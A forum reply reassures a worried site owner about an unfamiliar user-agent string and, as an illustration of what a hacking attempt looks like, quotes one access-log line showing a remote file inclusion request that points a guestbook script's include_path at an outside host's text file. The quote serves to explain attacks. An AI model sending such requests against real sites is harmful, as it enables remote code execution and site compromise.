Hi, STN, and welcome to the forums.
I was hoping somebody more knowledgeable would have answered by now, but in the absence of anybody else, I'll offer an opinion. I've been truly paranoid since I had sites hacked, and I know the feeling of panic it engenders.
I'm not an expert, but that looks OK to me as a user-agent string. I couldn't find an exact match for it, but since you say the IP is Chinese, I'd guess it's IE8 with a Chinese add-on of some sort. Have a look at this site for some reassurance on how user-agent strings look.
This I really don't know about.
From my very limited experience, a hacking attempt will show an IP accessing your site several times in the space of a couple of minutes, rather than at various times throughout the day, with something like:
220.127.116.11 - - [28/Oct/2011:03:22:11 +0100] "GET /guestbook.php//admin.php?include_path=http://magthai.com/images/config.txt?? HTTP/1.1" 403 553 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
Hope that helps. With a bit of luck, somebody else will chip in here with more information.